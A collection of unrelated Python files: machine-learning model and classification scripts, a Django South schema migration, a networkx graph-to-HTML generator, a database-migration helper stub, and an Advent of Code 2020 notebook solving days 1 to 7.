UnionRule(RewrittenBuildFileRequest, FormatWithBlackRequest),
UnionRule(RewrittenBuildFileRequest, FormatWithYapfRequest),
)
|
import numpy as np
from keras.callbacks import Callback
from keras.optimizers import SGD
from sklearn.neural_network import MLPClassifier
from keras.models import Sequential
from keras.layers import Dense
from .BaseModel import BaseModel
from ..utils import YpredCallback
class NN_LinearLinear_Sklearn(BaseModel):
"""2 Layer linear-linear neural network using Keras"""
parametric = False
bootlist = None
def __init__(self, n_nodes=2, epochs=200, learning_rate=0.01, momentum=0.0, decay=0.0, nesterov=False, loss="binary_crossentropy", batch_size=None, verbose=0):
self.n_nodes = n_nodes
self.verbose = verbose
self.n_epochs = epochs
self.k = n_nodes
self.batch_size = batch_size
self.loss = loss
self.learning_rate = learning_rate
self.momentum = momentum
self.decay = decay
self.optimizer = "sgd"
def train(self, X, Y, epoch_ypred=False, epoch_xtest=None):
""" Fit the neural network model, save additional stats (as attributes) and return Y predicted values.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Predictor variables, where n_samples is the number of samples and n_features is the number of predictors.
Y : array-like, shape = [n_samples, 1]
Response variables, where n_samples is the number of samples.
Returns
-------
y_pred_train : array-like, shape = [n_samples, 1]
Predicted y score for samples.
"""
# If batch-size is None:
if self.batch_size is None:
self.batch_size = len(X)
# Ensure array and error check
X, Y = self.input_check(X, Y)
self.model = MLPClassifier(hidden_layer_sizes=(self.n_nodes,),
activation='identity',
solver=self.optimizer,
learning_rate_init=self.learning_rate,
momentum=self.momentum,
batch_size=self.batch_size,
nesterovs_momentum=False,
max_iter=self.n_epochs)
# Fit
self.model.fit(X, Y)
y_pred_train = self.model.predict(X)
# Storing X, Y, and Y_pred
self.Y_pred = y_pred_train
self.X = X
self.Y = Y
return y_pred_train
def test(self, X, Y=None):
"""Calculate and return Y predicted value.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Test variables, where n_samples is the number of samples and n_features is the number of predictors.
Returns
-------
y_pred_test : array-like, shape = [n_samples, 1]
Predicted y score for samples.
"""
y_pred_test = self.model.predict(X)
return y_pred_test
|
# -*- coding: utf-8 -*-
"""
Created on Fri Nov 30 16:08:57 2018
@author: aadha
"""
import pandas as pd
import os
import numpy as np
from sklearn.model_selection import StratifiedKFold
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import accuracy_score
from sklearn.svm import SVC
def stratified(data, fold):
skf = StratifiedKFold(n_splits=fold, random_state = 42)
X = data.iloc[:,:-1].values
y = data.iloc[:,-1].values.tolist()
i = 0
accuracy = []
for train_index, test_index in skf.split(X, y):
X_train, X_test = data.iloc[train_index,:-1].values, data.iloc[test_index,:-1].values
y_train, y_test = data.iloc[train_index,-1].values.tolist(), data.iloc[test_index,-1].values.tolist()
"""
# Feature Scaling
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
"""
#
#choose classifier
classifier = SVC(kernel = 'linear')
# Fitting classifier to the Training set
classifier.fit(X_train, y_train)
# Predicting the Test set results
y_pred = classifier.predict(X_test)
# Making the Confusion Matrix
#cm = confusion_matrix(y_test, y_pred)
accuracy.append(accuracy_score(y_test, y_pred))
#print("Fold {}: {}".format(i,accuracy_score(y_test, y_pred)))
i+=1
return sum(accuracy)/len(accuracy)
if __name__ == "__main__":
data = []
for files in os.listdir('feature'):
matrix = pd.read_csv(os.path.join('feature',files))
data.append(matrix.dropna(axis=0))
PCA_data = []
for d in data:
FinalFeatures = []
label = d.iloc[:,-1].values.tolist()
dat = d.iloc[:,:-1]
X = StandardScaler().fit_transform(dat)
pca = PCA(n_components=5)
x_new = pca.fit_transform(X)
#PCAframe = pd.DataFrame(x_new)
#PCAframe['label'] = label
#PCA_data.append(PCAframe)
dum = pca.components_[:5]
index = []
for item in dum:
item = pd.Series(item)
index.append(item[item == max(item)].index[0])
index.append(d.shape[1]-1)
classificationData = d.iloc[:,index] #
accuracy = (stratified(classificationData, 5))
print("Total accuracy {}".format(accuracy))
"""
j = 0
for user in PCA_data:
print("User {}".format(j+1))
accuracy = (stratified(user, 5))
print("Accuracy: {}".format(accuracy))
j+=1
""" |
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'Inventory.purchased_date'
db.delete_column(u'inventory_inventory', 'purchased_date')
# Deleting field 'Inventory.is_lost'
db.delete_column(u'inventory_inventory', 'is_lost')
# Deleting field 'Inventory.is_damaged'
db.delete_column(u'inventory_inventory', 'is_damaged')
# Deleting field 'Inventory.lost_date'
db.delete_column(u'inventory_inventory', 'lost_date')
# Deleting field 'Inventory.damaged_date'
db.delete_column(u'inventory_inventory', 'damaged_date')
# Deleting field 'Inventory.price_currency'
db.delete_column(u'inventory_inventory', 'price_currency')
# Deleting field 'Inventory.purchased_from'
db.delete_column(u'inventory_inventory', 'purchased_from')
# Deleting field 'Inventory.price'
db.delete_column(u'inventory_inventory', 'price')
def backwards(self, orm):
# Adding field 'Inventory.purchased_date'
db.add_column(u'inventory_inventory', 'purchased_date',
self.gf('django.db.models.fields.DateField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'Inventory.is_lost'
db.add_column(u'inventory_inventory', 'is_lost',
self.gf('django.db.models.fields.BooleanField')(default=False),
keep_default=False)
# Adding field 'Inventory.is_damaged'
db.add_column(u'inventory_inventory', 'is_damaged',
self.gf('django.db.models.fields.BooleanField')(default=False),
keep_default=False)
# Adding field 'Inventory.lost_date'
db.add_column(u'inventory_inventory', 'lost_date',
self.gf('django.db.models.fields.DateField')(null=True, blank=True),
keep_default=False)
# Adding field 'Inventory.damaged_date'
db.add_column(u'inventory_inventory', 'damaged_date',
self.gf('django.db.models.fields.DateField')(null=True, blank=True),
keep_default=False)
# Adding field 'Inventory.price_currency'
db.add_column(u'inventory_inventory', 'price_currency',
self.gf('djmoney.models.fields.CurrencyField')(default='NPR'),
keep_default=False)
# Adding field 'Inventory.purchased_from'
db.add_column(u'inventory_inventory', 'purchased_from',
self.gf('django.db.models.fields.CharField')(default=datetime.datetime(2015, 6, 29, 0, 0), max_length=100),
keep_default=False)
# Adding field 'Inventory.price'
db.add_column(u'inventory_inventory', 'price',
self.gf('djmoney.models.fields.MoneyField')(max_digits=8, decimal_places=2, default_currency='NPR'),
keep_default=False)
models = {
u'inventory.inventory': {
'Meta': {'object_name': 'Inventory'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100'})
}
}
complete_apps = ['inventory'] |
#!/usr/bin/env python
###############################################################################
#
# Copyright (c) 2016-2017 EnterpriseDB - All rights reserved.
# Author: Raghavedra Rao
#
# This module validates all the CLI option processed in cli_options module
# and does the sanity check of the values to pass on.
###############################################################################
# Python module
import os
import sys
import re
# DMA module
from templates.misc.dma_regex import *
from templates.cli.cli_args_validator import *
from templates.misc.precheck import *
def get_object_name_from_sqlfile(sqlfile, obj_type):
name = 'xyz'
return name
def extract_ddl_from_sqlfile_and_write_to_file(otype,
sqlfile,
):
obj_tmp_filename = '%s%s_%s_%s.sql' % \
(assessment_files_write_location,
obj_schema,
obj_type,
obj_name)
logger.info ("Writing to file...%s" % obj_tmp_filename)
ofile = open (obj_tmp_filename, 'w')
with open (sqlfile, 'r') as f:
gen = object_section (f)
for line in gen:
ofile.write (line)
ofile.close ()
return obj_tmp_filename
|
import json
import networkx as nx
from networkx.readwrite import json_graph
import pandas as pd
from jsm.jsm_analysis import test2
_CODE_TMPL = '*GRAPH_TMPL*'
_BR_TMPL = 'br'
def generate_graph(hypothesis, path, name_reas):
# DEFAULT _draw_edges_1()
G = nx.Graph()
scale = 2 # space near node
count_line_reas = 3 # point in line reas
smesh_row = 1 # left margin of next row
if (isinstance(hypothesis[0], list) == True):
_draw_nodes2(G, hypothesis, scale, 8, name_reas, count_line_reas, smesh_row)
else:
_draw_nodes1(G, hypothesis, scale, 8, name_reas, count_line_reas, smesh_row)
d = json_graph.node_link_data(G)
d['edges'] = d['links']
d['links'] = []
s = json.dumps(d)
_generate_cause_html(path, s)
print(s)
def _generate_cause_html(path, s):
tmpl = open('gui/templates/cause_template.html')
# tmpl = open('templates/cause_template.html') # square
text = tmpl.read()
# print(text)
tmpl.close()
text = text.replace(_CODE_TMPL, s)
dest = open(path, 'w', encoding='utf-8')
dest.write(text)
dest.close()
def _draw_nodes2(G, hypothesis, scale, size_node, name_reas, count_line_reas, smesh_row):
mas_edge = []
mas_reas = []
last_id = 0
count_node = 0
x_t, y_t = 1 * scale, 1 * scale
colors = ['green', 'darkred', 'brown', 'yellow', 'blue', 'orange']
node_colors = ['darkblue', 'purple', 'gray']
sel_nod_col = 0 # select color for NODES
d1 = len(hypothesis) # count of pairs in hypotheses
for i in range(d1):
d2 = len(hypothesis[i])
for k in range(d2):
lengmass = len(hypothesis[i][k].value) # count of reasons
for j in range(lengmass):
if hypothesis[i][k].value[j] == True:
if mas_reas.count(j) > 0:
mas_edge.append(mas_edge[j])
else:
mas_edge.append(last_id)
lab = name_reas[j + 1]
# lab = 'test'
if mas_reas.count(j) < 1:
if (count_node % count_line_reas == 0) & (j > 0):
y_t += 2 * scale
x_t = smesh_row + 1 * scale
G.add_node(last_id, x=x_t, y=y_t, size=size_node, label=lab, color=node_colors[sel_nod_col]) # add node reas
last_id += 1
x_t += 1 * scale
count_node += 1
mas_reas.append(j)
else:
mas_edge.append(None)
mas_reas.append(None)
sel_nod_col += 1
if sel_nod_col > 1:
sel_nod_col = 0
num = mas_edge.count(None)
for i in range(num):
mas_edge.remove(None)
for i in range(len(mas_reas)):
if mas_reas[i] is None:
mas_edge.insert(i, None)
_draw_edges_1(G, colors, mas_edge)
# _draw_edges(G, colors) # next variant of draw grah
def _draw_nodes1(G, hypothesis, scale, size_node, name_reas, count_line_reas, smesh_row):
mas_edge = []
mas_reas = []
last_id = 0
count_node = 0
x_t, y_t = 1 * scale, 1 * scale
colors = ['green', 'darkred', 'brown', 'yellow', 'blue', 'orange']
node_colors = ['darkblue', 'purple', 'gray']
sel_nod_col = 0 # select color for NODES
d1 = len(hypothesis) # count of pairs in hypotheses
for i in range(d1):
lengmass = len(hypothesis[i].value) # count of reasons
for j in range(lengmass):
if hypothesis[i].value[j] == True:
if mas_reas.count(j) > 0:
mas_edge.append(mas_edge[j])
else:
mas_edge.append(last_id)
lab = name_reas[j + 1]
# lab = 'test'
if mas_reas.count(j) < 1:
if (count_node % count_line_reas == 0) & (j > 0):
y_t += 2 * scale
x_t = smesh_row + 1 * scale
G.add_node(last_id, x=x_t, y=y_t, size=size_node, label=lab,
color=node_colors[sel_nod_col]) # add node reas
last_id += 1
x_t += 1 * scale
count_node += 1
mas_reas.append(j)
else:
mas_edge.append(None)
mas_reas.append(None)
sel_nod_col += 1
if sel_nod_col > 1:
sel_nod_col = 0
num = mas_edge.count(None)
for i in range(num):
mas_edge.remove(None)
for i in range(len(mas_reas)):
if mas_reas[i] is None:
mas_edge.insert(i, None)
_draw_edges_1(G, colors, mas_edge)
_draw_edges(G, colors, mas_edge) # next variant of draw grah
def _draw_edges_1(G, colors, mas_edge):
# mas_edge = []
select_color = 0
source = mas_edge[0]
target = mas_edge[1]
for i in range(len(mas_edge) - 1):
if source is None or target is None:
source = mas_edge[i]
target = mas_edge[i + 1]
select_color += 1
if select_color >= 6:
select_color=0
else:
G.add_edge(source, target, id=i, color=colors[select_color])
target = mas_edge[i + 1]
_change_node_size(G, mas_edge)
def _draw_edges(G, colors, mas_edge): # posled draw
# mas_edge = []
select_color = 0
source = mas_edge[0]
target = mas_edge[1]
for i in range(len(mas_edge) - 2):
if source is None or target is None:
source = mas_edge[i + 1]
target = mas_edge[i + 2]
select_color += 1
else:
G.add_edge(source, target, id=i, color=colors[select_color])
source = mas_edge[i + 1]
target = mas_edge[i + 2]
_change_node_size(G, mas_edge)
def _change_node_size(G, mas_edge):
mas_node_size = []
for i in range(len(mas_edge)):
if (mas_edge.count(i) > 0):
mas_node_size.append(mas_edge.count(i))
if (mas_node_size[i] >= 10):
mas_node_size[i] = 10
if ((mas_node_size[i] < 10) and (mas_node_size[i] >= 2)):
mas_node_size[i] = 9
if (mas_node_size[i] < 2):
mas_node_size[i] = 8
for i in range(len(mas_node_size)):
G.node[i]['size'] = mas_node_size[i]
_change_node_color(G, mas_node_size)
def _change_node_color(G, mas_node_size):
node_color = ['darkred', 'yellow', 'green']
for i in range(len(mas_node_size)):
if (mas_node_size[i] == 10):
G.node[i]['color'] = node_color[0]
if (mas_node_size[i] == 9):
G.node[i]['color'] = node_color[1]
if (mas_node_size[i] == 8):
G.node[i]['color'] = node_color[2]
if __name__ == '__main__':
data = pd.read_csv('../data/ex1.csv', encoding='cp1251', sep=';', index_col=False, na_values='?')
name_reas = list(data.columns.values)
print(name_reas)
hypothesis = test2()
path = 'templates/res.html'
generate_graph(hypothesis, path, name_reas)
|
#!/usr/bin/env python
# coding: utf-8
# # Advent of Code 2020
#
# This solution (Jupyter notebook; python 3.7) by kannix68, @ 2020-12. \
# Using anaconda distro, conda v4.9.2. installation on MacOS v10.14.6 "Mojave".
# ## Generic AoC code
# In[ ]:
import sys
import logging
import itertools
#from operator import mul
import re
import numpy as np
import lib.aochelper as aoc
from lib.aochelper import map_list as mapl
from lib.aochelper import filter_list as filterl
print("Python version:", sys.version)
print("Version info:", sys.version_info)
log = aoc.getLogger(__name__)
print(f"initial log-level={log.getEffectiveLevel()}")
EXEC_RESOURCE_HOGS = False
EXEC_EXTRAS = False
# ## Problem domain code
# ### Day 1: Report Repair
# In[ ]:
print("Day 1 a")
# In[ ]:
THIS_YEAR = 2020 # "Last christmas, I gave you my heart... this year..." - Wham!
# In[ ]:
test_str = """
1721
979
366
299
675
1456""".strip()
tests = list(map(int, test_str.split("\n")))
log.warning(tests)
# In[ ]:
def solve01a(l):
for v in itertools.combinations(l, 2):
v = np.array(v) # using numpy for elegance, array "object" methods .sum() and .prod()
#print(v)
if v.sum() == THIS_YEAR:
log.info(f"found {v}")
p = v.prod()
log.debug(f"product={p}")
break
return p
# In[ ]:
result = solve01a(tests)
print("tests solution", result)
# In[ ]:
ins = list(map(int, aoc.read_file_to_list('./in/day01.in')))
#ins
# In[ ]:
result = solve01a(ins)
print("Day 1 a solution:", result)
# In[ ]:
def solve01b(l):
for v in itertools.combinations(l, 3):
v = np.array(v)
#print(v)
if v.sum() == THIS_YEAR:
log.info(f"found {v}")
p = v.prod() #np.prod(np.array(v))
log.debug(f"product={p}")
break
return p
# In[ ]:
print("Day 1 b")
print("test results:", solve01b(tests))
# In[ ]:
print("Day 1 b solution:", solve01b(ins))
# ### Day 2: Password Philosophy
# In[ ]:
print("Day 2 a")
# In[ ]:
test_str = """
1-3 a: abcde
1-3 b: cdefg
2-9 c: ccccccccc
""".strip()
tests = test_str.split("\n")
#tests
# In[ ]:
def solve02a(l):
ct = 0
for line in l:
rules, pwd = line.split(': ')
nums, char = rules.split(' ')
min_num, max_num = map(int, nums.split('-'))
#print(min_num, max_num, char, pwd)
num_ocur = pwd.count(char)
if num_ocur >= min_num and num_ocur <= max_num:
#print(" pwd is valid")
ct += 1
#else:
# print(" pwd is INvalid")
log.debug(f"num of valid passwords={ct}")
return ct
# In[ ]:
result = solve02a(tests)
print("tests result:", result)
# In[ ]:
ins = aoc.read_file_to_list('./in/day02.in')
print("Day 2 a solution:", solve02a(ins))
# In[ ]:
def solve02b(l):
ct = 0
for line in l:
rules, pwd = line.split(': ')
nums, char = rules.split(' ')
min_num, max_num = map(int, nums.split('-'))
#print(min_num, max_num, char, pwd)
num_ocur = pwd[min_num-1].count(char) + pwd[max_num-1].count(char)
if num_ocur == 1:
#print(" pwd is valid")
ct += 1
#else:
# print(" pwd is INvalid")
log.debug(f"num of valid passwords={ct}")
return ct
# In[ ]:
print("Day 2 b")
print("assert day 2 b test conditions")
assert( 1 == solve02b([tests[0]]) )
assert( 0 == solve02b([tests[1]]) )
assert( 0 == solve02b([tests[2]]) )
print("assertions were ok.")
# In[ ]:
print("tests result:", solve02b(tests))
# In[ ]:
print("Day 2 b solution:", solve02b(ins))
# ### Day 3: Toboggan Trajectory
# In[ ]:
print("Day 3 a")
# In[ ]:
test_str = """
..##.......
#...#...#..
.#....#..#.
..#.#...#.#
.#...##..#.
..#.##.....
.#.#.#....#
.#........#
#.##...#...
#...##....#
.#..#...#.#
""".strip()
tests = test_str.split("\n")
log.debug(tests)
# In[ ]:
def prepare_input(l):
outlist = []
for line in l:
outlist.append(list(map(lambda it: 1 if it == '#' else 0, list(line))))
return outlist
tests = prepare_input(tests)
log.debug(tests)
# In[ ]:
def solve03a(l2d):
num_rows = len(l2d)
num_cols = len(l2d[0])
log.info(f"num rows={num_rows}, cols={num_cols}")
posx, posy = [0, 0]
dx, dy = [3, 1]
ct = 0
tpath = ''
for iter in range(1, num_rows+2):
#print(f"iter {iter}")
if l2d[posy][posx%num_cols] == 1:
ct += 1
tpath += 'X'
else:
tpath += '0'
posx += dx
posy += dy
#print(f"new pos={[posx, posy]}")
if posy > num_rows-1:
log.debug(f"break at iter#={iter}")
break
else:
iter += 1
outstr = f"encountered {ct} trees."
if log.getEffectiveLevel() <= logging.DEBUG:
outstr += f"Path={tpath}"
log.info(outstr)
return ct
# In[ ]:
print("Day 3 a tests:")
print(solve03a(tests))
# In[ ]:
ins = prepare_input(aoc.read_file_to_list('./in/day03.in'))
# In[ ]:
result = solve03a(ins)
print("Day 3 a solution:", result)
# In[ ]:
def solve03b(l2d, vec):
num_rows = len(l2d)
num_cols = len(l2d[0])
log.debug(f"num rows={num_rows}, cols={num_cols}, vector={vec}")
posx, posy = [0, 0]
dx, dy = vec #reversed(vec)
ct = 0
for iter in range(0, num_rows+1):
#print(f"i={iter} @{[posx, posy]} : {l2d[posy][posx%num_cols]}")
if l2d[posy][posx%num_cols] == 1:
ct += 1
posx += dx
posy += dy
if posy > num_rows-1:
log.debug(f"break at iter#={iter}")
break
else:
iter += 1
log.debug(f"encountered {ct} trees.")
return ct
# In[ ]:
print("Day 3 b")
#print("number of trees encountered:", solve3b(tests, [3, 1]))
# In[ ]:
print("assert day 3 b test conditions:")
assert( 2 == solve03b(tests, [1, 1]))
assert( 7 == solve03b(tests, [3, 1]))
assert( 3 == solve03b(tests, [5, 1]))
assert( 4 == solve03b(tests, [7, 1]))
assert( 2 == solve03b(tests, [1, 2]))
print("assertions were ok.")
# In[ ]:
p = solve03b(tests, [1, 1]) * solve03b(tests, [3, 1]) * solve03b(tests, [5, 1]) * solve03b(tests, [7, 1]) * solve03b(tests, [1, 2])
print("day 3 b test result (product):", p)
# In[ ]:
p = solve03b(ins, [1, 1]) * solve03b(ins, [3, 1]) * solve03b(ins, [5, 1]) * solve03b(ins, [7, 1]) * solve03b(ins, [1, 2])
print("day 3 b solution (product):", p)
# ### Day 4: Passport Processing
# In[ ]:
fields_mandat = {'byr', 'iyr', 'eyr', 'hgt', 'hcl', 'ecl', 'pid'}
fields_opt = {'cid'}
# In[ ]:
test_str = """
ecl:gry pid:860033327 eyr:2020 hcl:#fffffd
byr:1937 iyr:2017 cid:147 hgt:183cm
iyr:2013 ecl:amb cid:350 eyr:2023 pid:028048884
hcl:#cfa07d byr:1929
hcl:#ae17e1 iyr:2013
eyr:2024
ecl:brn pid:760753108 byr:1931
hgt:179cm
hcl:#cfa07d eyr:2025 pid:166559648
iyr:2011 ecl:brn hgt:59in
""".strip()
tests = test_str.split("\n\n")
log.debug(tests)
# In[ ]:
def passport_valid(passport):
entries = re.split(r'\s+', passport)
log.debug(entries)
fields = []
for entry in entries:
field = entry.split(':')[0]
fields.append(field)
#log.debug(sorted(fields))
b = fields_mandat.issubset(fields)
log.debug(f"valid?: {b}")
return b
# In[ ]:
def solve04a(passports):
ct = 0
for passport in passports:
if passport_valid(passport):
ct +=1
log.debug(f"valid-count: {ct}")
return ct
# In[ ]:
print("tests valid-count:", solve04a(tests))
# In[ ]:
ins = aoc.read_file_to_str('./in/day04.in').split("\n\n")
print("Day 4 a solution: valid-count:", solve04a(ins))
# In[ ]:
def passport_valid2(passport):
entries = re.split(r'\s+', passport)
log.debug(entries)
fields = []
values = []
for entry in entries:
field, val = entry.split(':')
fields.append(field)
values.append(val)
#log.debug(sorted(fields))
if not fields_mandat.issubset(fields):
log.debug("invalid: mandatory fields missing")
return False
for idx, field in enumerate(fields):
val = values[idx]
if field == 'byr':
# byr (Birth Year) - four digits; at least 1920 and at most 2002.
ival = int(val)
if not (ival >= 1920 and ival <= 2002):
log.debug(f"invalid: byr value {val}")
return False
elif field == 'iyr':
# iyr (Issue Year) - four digits; at least 2010 and at most 2020.
ival = int(val)
if not (ival >= 2010 and ival <= THIS_YEAR):
log.debug(f"invalid: iyr value {val}")
return False
elif field == 'eyr':
# eyr (Expiration Year) - four digits; at least 2020 and at most 2030
ival = int(val)
if not (ival >= THIS_YEAR and ival <= 2030):
log.debug(f"invalid: eyr value {val}")
return False
elif field == 'hgt':
# hgt (Height) - a number followed by either cm or in:
# - If cm, the number must be at least 150 and at most 193.
# - If in, the number must be at least 59 and at most 76.
# py-regex: ^(\d+)(?=cm|in)(cm|in)$
if not re.match(r'^\d+(cm|in)$', val):
log.debug(f"invalid: hgt val={val}, form.")
return False
numstr, unit = re.split(r'(?=cm|in)', val)
num = int(numstr)
if unit == 'cm':
if not (num >= 150 and num <= 193):
log.debug(f"invalid: hgt val={val} num={num}")
return False
elif unit == 'in':
if not (num >= 59 and num <= 76):
log.debug(f"invalid: hgt val={val} num={num}")
return False
else:
log.debug(f"invalid: hgt val={val} unit={unit}")
return False
elif field == 'hcl':
# hcl (Hair Color) - a # followed by exactly six characters 0-9 or a-f.
if not re.match(r'^#[0-9a-f]{6}$', val):
log.debug(f"invalid: hcl value {val}")
return False
elif field == 'ecl':
# ecl (Eye Color) - exactly one of: amb blu brn gry grn hzl oth.
if not val in ['amb', 'blu', 'brn', 'gry', 'grn', 'hzl', 'oth']:
log.debug(f"invalid: ecl value {val}")
return False
elif field == 'pid':
# pid (Passport ID) - a nine-digit number, including leading zeroes.
if not re.match(r'^[0-9]{9}$', val):
log.debug(f"invalid: pid value {val}")
return False
log.debug("valid!")
return True
# In[ ]:
tests_invalid = """
eyr:1972 cid:100
hcl:#18171d ecl:amb hgt:170 pid:186cm iyr:2018 byr:1926
iyr:2019
hcl:#602927 eyr:1967 hgt:170cm
ecl:grn pid:012533040 byr:1946
hcl:dab227 iyr:2012
ecl:brn hgt:182cm pid:021572410 eyr:2020 byr:1992 cid:277
hgt:59cm ecl:zzz
eyr:2038 hcl:74454a iyr:2023
pid:3556412378 byr:2
""".strip().split("\n\n")
# In[ ]:
print("tests, all invalid:")
for passport in tests_invalid:
print(passport.replace("\n", " "))
print("valid?:", passport_valid2(passport))
print()
# In[ ]:
tests_valid = """
pid:087499704 hgt:74in ecl:grn iyr:2012 eyr:2030 byr:1980
hcl:#623a2f
eyr:2029 ecl:blu cid:129 byr:1989
iyr:2014 pid:896056539 hcl:#a97842 hgt:165cm
hcl:#888785
hgt:164cm byr:2001 iyr:2015 cid:88
pid:545766238 ecl:hzl
eyr:2022
iyr:2010 hgt:158cm hcl:#b6652a ecl:blu byr:1944 eyr:2021 pid:093154719
""".strip().split("\n\n")
# In[ ]:
print("tests, all valid:")
for passport in tests_valid:
print(passport.replace("\n", " "))
print("valid?:", passport_valid2(passport))
print()
# In[ ]:
def solve04b(passports):
ct = 0
for passport in passports:
log.debug(passport)
if passport_valid2(passport):
ct +=1
log.debug(f"valid-count: {ct}")
return ct
# In[ ]:
assert( 0 == solve04b(tests_invalid) )
# In[ ]:
assert( 4 == solve04b(tests_valid) )
# In[ ]:
result = solve04b(ins)
print("Day 4 b result:", result)
# ### Day 5: Binary Boarding
# In[ ]:
import functools
import operator
# see: [python - How to make a flat list out of list of lists? - Stack Overflow](https://stackoverflow.com/questions/952914/how-to-make-a-flat-list-out-of-list-of-lists)
def flatten_list(l):
"""Flatten a list."""
return functools.reduce(operator.iconcat, l, [])
def get_seat_id(s):
rows = aoc.range_list(0, 128)
cols = aoc.range_list(0, 8)
#log.debug(cols)
for c in s:
if c == 'F':
rows = rows[:len(rows)//2]
elif c == 'B':
rows = rows[len(rows)//2:]
elif c == 'L':
cols = cols[:len(cols)//2]
elif c == 'R':
cols = cols[len(cols)//2:]
result_list = flatten_list([rows, cols])
log.debug(result_list)
return result_list[0]*8 + result_list[1]
# In[ ]:
boardingpass = 'FBFBBFFRLR'
get_seat_id(boardingpass)
# In[ ]:
# Given tests:
assert(357 == get_seat_id('FBFBBFFRLR'))
# In[ ]:
assert(567 == get_seat_id('BFFFBBFRRR'))
assert(119 == get_seat_id('FFFBBBFRRR'))
assert(820 == get_seat_id('BBFFBBFRLL'))
# In[ ]:
ins = aoc.read_file_to_list('./in/day05.in')
print( "Day 5 a solution:", max(map(get_seat_id, ins)) )
# In[ ]:
print("number of boarding passes given:", (len(ins)))
#print("number of used rows in plane:", (len(ins)+1)/8.0)
min_seat_id = 0*8 + 0 # from min row and min column/seat
max_seat_id = 127*8 + 7 # from max row and max column/seat
print("seat_id min/max", [min_seat_id, max_seat_id])
# In[ ]:
seat_ids = aoc.range_list(min_seat_id, max_seat_id+1)
for boardingpass in ins: # remove used/given seat_id
seat_ids.remove(get_seat_id(boardingpass))
log.debug("ids remain unseen:")
log.debug(seat_ids)
for seat_id in seat_ids:
if not( (seat_id-1) in seat_ids and (seat_id>min_seat_id) ) and not( (seat_id+1) in seat_ids and (seat_id<max_seat_id) ):
print("(Day 5 b solution) found id:", seat_id)
# ### Day 6: Custom Customs
# In[ ]:
test_str = """
abcx
abcy
abcz
""".strip()
test = test_str.split("\n")
log.debug(test)
# In[ ]:
from collections import defaultdict
# In[ ]:
def get_group_answers(answers_in):
answers = defaultdict(int)
for tanswers in answers_in:
for tanswer in tanswers:
answers[tanswer] += 1
#log.debug(answers)
#log.debug(f"len={len(answers.keys())}, vals={answers.keys()}")
return answers
# In[ ]:
print("testing...", get_group_answers(test))
# In[ ]:
assert( 6 == len(get_group_answers(test).keys()) )
# In[ ]:
test_str = """
abc
a
b
c
ab
ac
a
a
a
a
b
""".strip()
tests = test_str.split("\n\n")
log.debug(tests)
# In[ ]:
def solve06a(groupanswers):
i = 0
for groupanswer in groupanswers:
result = get_group_answers(groupanswer.split("\n")).keys()
#log.debug(f"distinctanswers={result} for {groupanswer}")
i += len(result)
log.info(f"answerssum={i}")
return i
# In[ ]:
assert( 11 == solve06a(tests) )
print("test assertion ok.")
# In[ ]:
ins = aoc.read_file_to_str('./in/day06.in').split("\n\n")
print("Day 6 a solution: groupanwers-sum:", solve06a(ins))
# In[ ]:
print("Day 6 b")
# In[ ]:
def get_group_answers2(answers_in):
answers = defaultdict(int)
num_persons = len(answers_in)
for tanswers in answers_in:
for tanswer in tanswers:
answers[tanswer] += 1
#log.debug(answers)
#log.debug(len(answers.keys()), answers.keys())
ct = 0
#for idx, (key, val) in enumerate(d.items()):
for key, val in answers.items():
if val == num_persons:
ct += 1
return ct
def solve06b(groupanswers):
i = 0
for groupanswer in groupanswers:
result = get_group_answers2(groupanswer.split("\n"))
#log.debug(f"all-answers={result} for {groupanswer}")
i += result
log.info(f"all-answers-sum={i}")
return i
# In[ ]:
assert( 6 == solve06b(tests) )
print("test assertion ok.")
# In[ ]:
print("Day 6 b solution: groupanwers-sum:", solve06b(ins))
# ### Day 7: Handy Haversacks
# In[ ]:
import networkx as nx
# In[ ]:
test_str = """
light red bags contain 1 bright white bag, 2 muted yellow bags.
dark orange bags contain 3 bright white bags, 4 muted yellow bags.
bright white bags contain 1 shiny gold bag.
muted yellow bags contain 2 shiny gold bags, 9 faded blue bags.
shiny gold bags contain 1 dark olive bag, 2 vibrant plum bags.
dark olive bags contain 3 faded blue bags, 4 dotted black bags.
vibrant plum bags contain 5 faded blue bags, 6 dotted black bags.
faded blue bags contain no other bags.
dotted black bags contain no other bags.
""".strip()
tests = test_str.split("\n")
log.debug(test)
# In[ ]:
def get_bag_graph(l):
graph = nx.DiGraph()
for line in l:
try:
src, trg = line.split(" bags contain ")
except ValueError:
log.error(f"parse error, input=>{line}<")
bags_contained = trg.replace(".", "").split(", ")
if not (len(bags_contained) == 1 and bags_contained[0].startswith("no other")):
graph.add_node(src)
for idx, bag_in in enumerate(bags_contained):
rxm = re.match(r"^(\d+)\s+(.*?)\s+bag", bag_in)
res = [int(rxm.group(1)), rxm.group(2)]
#log.debug("src:", src, "; trg:", res)
bags_contained[idx] = res
graph.add_node(res[1])
#log.debug(f"add_edge {src} => {res[0]} {res[1]}")
graph.add_edge(src, res[1], weight=res[0])
else:
graph.add_edge(src, "END", weight=0)
#print(src, bags_contained)
log.info( f"graph # of nodes: {len(graph.nodes())}" )
log.info( f"graph # of edges: {len(graph.edges())}" )
return graph
# In[ ]:
graph = get_bag_graph(tests)
for e in graph.edges():
log.debug(f" edge: {e} attrs={nx.get_edge_attributes(graph, 'weight')[e]}")
# In[ ]:
def get_paths_to(graph, trg):
paths = []
for src in graph.nodes():
#log.debug("src:", src)
for p in nx.all_simple_paths(graph, src, trg):
paths.append(p)
return paths
# In[ ]:
def solve07a(l, trg):
graph = get_bag_graph(l)
sources = aoc.map_list(lambda it: it[0], get_paths_to(graph, trg))
num_sources = len(set(sources))
return num_sources
# In[ ]:
trg = 'shiny gold'
assert( 4 == solve07a(tests, trg) )
# In[ ]:
ins = aoc.read_file_to_str('./in/day07.in').strip().split("\n")
print("Day 7 a solution: num-distinct-src-colors", solve07a(ins, 'shiny gold'))
# In[ ]:
